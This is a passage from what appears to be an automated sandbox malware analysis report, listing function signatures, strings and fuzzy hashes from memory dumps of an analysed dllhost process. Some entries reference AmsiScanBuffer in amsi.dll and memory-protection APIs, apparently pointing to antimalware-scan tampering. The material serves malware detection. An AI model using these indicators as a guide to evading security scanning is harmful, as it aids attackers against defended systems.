                                  • Instruction Fuzzy Hash: 8851A2312C5B45D6FB0AEB24D890ADA23A1BB4CF4CF840815AA2F677B5EF78D554C380
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID: $rbx-
                                  • API String ID: 756756679-3661604363
                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction ID: 74910829f5822d148a8c8a77f8d869f47f4f9a59f5558fd19638220135215f06
                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction Fuzzy Hash: 87318431741B52D2FB1ADF16D544BAB63A0FB4CF98F0840209F4A57B65EF34C5658700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocFree
                                  • String ID: $rbx-
                                  • API String ID: 756756679-3661604363
                                  • Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction ID: f7e8685bdfd3d4aa8409c8255c80aaa7433fc70eee2409636f0ef35ad212c045
                                  • Opcode Fuzzy Hash: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
                                  • Instruction Fuzzy Hash: E9318331785B61E2F76ADF16E544BAA67A0FB48F88F0840209F4A57B75EF38D5A18700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ErrorLast$Value$FreeHeap
                                  • String ID:
                                  • API String ID: 365477584-0
                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction ID: dacd4901707bdf25ac528c9142b3259b92f239a8ef18e8c691dbeb7aec19b33e
                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction Fuzzy Hash: C4114231690293C2FB1EE7316655BEF2152AB8DF9CF544624EB6B763E6CE68C4016340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: ErrorLast$Value$FreeHeap
                                  • String ID:
                                  • API String ID: 365477584-0
                                  • Opcode ID: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction ID: 30e6cc122492ccee0eef9c072facaeda0d20094f022cc320daa57995460d8f21
                                  • Opcode Fuzzy Hash: 2b4934949d3deca667ae4771e81ed1922e44bbeb7fb5f4fb09c3a9f1576f5646
                                  • Instruction Fuzzy Hash: D01130312D8280C2FA5EE771A411BEF61529B8CF9CF544624EA67777E6CE38D8415700
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID:
                                  • API String ID: 517849248-0
                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction ID: dbf91569eb8733a6cb095e2b32d6a221c8d28c98cabc97931e96b175443a636c
                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction Fuzzy Hash: C5013931745B92C2FA19EB12A958B9B62A1F78DFC8F4840349F5E53794DE38C5858740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                  • String ID:
                                  • API String ID: 517849248-0
                                  • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction ID: 99a9261cc867517e1fa60c3b37c89653b47c25fdf1460680f394c9211acc09f1
                                  • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                  • Instruction Fuzzy Hash: 52010935785A80C6FB19EB12A858B9A63A1FB8CFC8F484035DF5B53764DE38D585C740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                  • String ID:
                                  • API String ID: 449555515-0
                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction ID: aee6336f9fd36d82a8a0cf4f9f771f0f414139064cf5eeb90bebdae93916dc65
                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction Fuzzy Hash: C6012D75251B41C2FB2AEB21E948B9B73A1BB8EB49F144025DB4E263A5EF3DC048C740
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                  • String ID:
                                  • API String ID: 449555515-0
                                  • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction ID: fe219552678d3d254eaf2b4253f1fa970ec9f63d1c8b6b28d8e3abb369a7d46d
                                  • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                  • Instruction Fuzzy Hash: F4010975291740C2FB2AEB21E848B9A67A0AF8CF49F140425EB4B26774EF3DC058C740
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FinalHandleNamePathlstrlen
                                  • String ID: \\?\
                                  • API String ID: 2719912262-4282027825
                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction ID: 5a759e75dac7ead3a9f7f9a5778f9f382bb62d71059dc2f16bf0fecabb74acb0
                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction Fuzzy Hash: 5EF03C72354796D2FB25DB21E684B9BA361F78CB9CF8440219B49569A4DE6CC688CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: FinalHandleNamePathlstrlen
                                  • String ID: \\?\
                                  • API String ID: 2719912262-4282027825
                                  • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction ID: 061a11a583a4fd284594cbf5ae3652408d756ad7a2c7c9276b7f2a399ea03b8a
                                  • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                  • Instruction Fuzzy Hash: FFF04F72394685D2FB25DB21F584B9A6371FB89FCCFC48021DB4B56964DE6CCA88CB00
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CombinePath
                                  • String ID: \\.\pipe\
                                  • API String ID: 3422762182-91387939
                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction ID: e6e782a81b2bdd47ca626a69a8d6b85b5cb9f9b31fc63ff07c81f7d40a1ba6be
                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction Fuzzy Hash: 1AF082B4754B92C2FA4DEB13BA1859B6260BB4DFC8F449170EF0A27BA8CE2CC4458700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction ID: 07cf66e5b7ee7571d062d07f106d9a1e0f7ed6d4c889de0f4b9146d5ad7e5843
                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction Fuzzy Hash: DBF09071380702C1FA1ADB24A888FAB6364FB8DB6CF540219DB6A661F4CF3CC448C300
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CombinePath
                                  • String ID: \\.\pipe\
                                  • API String ID: 3422762182-91387939
                                  • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction ID: 1a700f1d16cc8ab77c86ccfac3266e67e751a952f2d874ff9ec10c266ec1caf0
                                  • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                  • Instruction Fuzzy Hash: CCF05EB4354B80D2FB19DB12B91459A6661BB4CFC9F448030EF0B27B68CE28D4458700
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction ID: bdc0c72e5b56717113a3f5ec42b62416de48a6e3182684ff969e52cd79e24a68
                                  • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                  • Instruction Fuzzy Hash: 0DF06D71284601C1FB1ADB24A884BAB6320AF8DB69F940319DB6BA61F4CF3CC448C200
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProcSleep
                                  • String ID: AmsiScanBuffer$amsi.dll
                                  • API String ID: 188063004-3248079830
                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction ID: 3ed7841d8f33fb771b9b8d3b75ce19e2169425255b445ff17969f7e1366fcea7
                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction Fuzzy Hash: 39D062706A2712D5F90FFB11D954BD722626F5DF09FD44415C70E212E0DE2CC5598340
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProcSleep
                                  • String ID: AmsiScanBuffer$amsi.dll
                                  • API String ID: 188063004-3248079830
                                  • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction ID: d773f82b61776e8c5af9b1f9cfba90243f458051ec459a872ba838094c49541e
                                  • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                  • Instruction Fuzzy Hash: 93D067306E5645D5FA0FFB15E854BD62361AFACF09FC40815C70F612B0DE2CE5598340
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction ID: 396ffe4f8bd65a235e9faff172d5bae8442481ee3ddc669c39a89c51ff0576ce
                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction Fuzzy Hash: 4B02D532259B85C6E7A5DB55E49079BB7A0F3C8B98F100015EB8F97BA9DB78C494CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: CurrentThread
                                  • String ID:
                                  • API String ID: 2882836952-0
                                  • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction ID: 25af94db02c113e2e071834ebbae11126ab0f927b72e676e9f90b72b355dac74
                                  • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                  • Instruction Fuzzy Hash: F502D53629DB84C6F765DB55E49079BB7A0F388B98F100015EB8F97BA8DB78C494CB00
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2700970371.000001C040212000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2702383653.000001C040219000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401f0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction ID: c0ff7504cc1287d95fecc32aff3352efa6d6da735263686e96a439a5e9777bae
                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction Fuzzy Hash: 95518E35694612CBF76ADB16A440E9BB3A4F78CB88F604119DF4B63BA5DB38C845CB40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2693444553.000001C0401C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401C0000, based on PE: true
                                  • Associated: 00000028.00000002.2692656658.000001C0401C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2694394471.000001C0401D5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2695253023.000001C0401E0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696077268.000001C0401E2000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2696800295.000001C0401E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_40_2_1c0401c0000_dllhost.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction ID: b7f86f4860ce4ab95438b03f52ec6ba2dd4c97ec051b90cb342c1004c2500665
                                  • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                  • Instruction Fuzzy Hash: 45518B36688601C7F36ADB56E440EABB3A0F79CF98F604119DF5B63B64DB38C8458B40
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000028.00000002.2698308226.000001C0401F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001C0401F0000, based on PE: true
                                  • Associated: 00000028.00000002.2697542026.000001C0401F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699174795.000001C040205000.00000002.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000028.00000002.2699989774.000001C040210000.00000004.00001000.00020000.00000000.sdmpDownload File
